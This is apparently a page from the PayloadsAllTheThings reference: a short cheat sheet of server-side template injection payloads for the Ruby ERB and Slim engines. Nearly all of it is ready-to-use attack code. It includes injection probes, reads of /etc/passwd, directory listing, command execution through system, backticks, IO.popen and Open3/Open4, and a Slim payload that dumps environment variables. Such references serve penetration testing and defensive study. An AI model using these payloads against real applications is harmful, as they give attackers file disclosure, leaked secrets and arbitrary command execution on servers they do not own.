PayloadsAllTheThings/Server Side Template Injection/Ruby.md

Server Side Template Injection - Ruby

Summary

• Ruby
  • Ruby - Basic injections
  • Ruby - Retrieve /etc/passwd
  • Ruby - List files and directories
  • Ruby - Code execution

Ruby

Ruby - Basic injections

ERB:

<%= 7 * 7 %>

Slim:

#{ 7 * 7 }

Ruby - Retrieve /etc/passwd

<%= File.open('/etc/passwd').read %>

Ruby - List files and directories

<%= Dir.entries('/') %>

Ruby - Code execution

Execute code using SSTI for ERB engine.

<%= system('cat /etc/passwd') %>
<%= `ls /` %>
<%= IO.popen('ls /').readlines()  %>
<% require  'open3' %><% @a,@b,@c,@d=Open3.popen3('whoami') %><%= @b.readline()%>
<% require 'open4' %><% @a,@b,@c,@d=Open4.popen4('whoami') %><%= @c.readline()%>

Execute code using SSTI for Slim engine.

#{ %x|env| }

---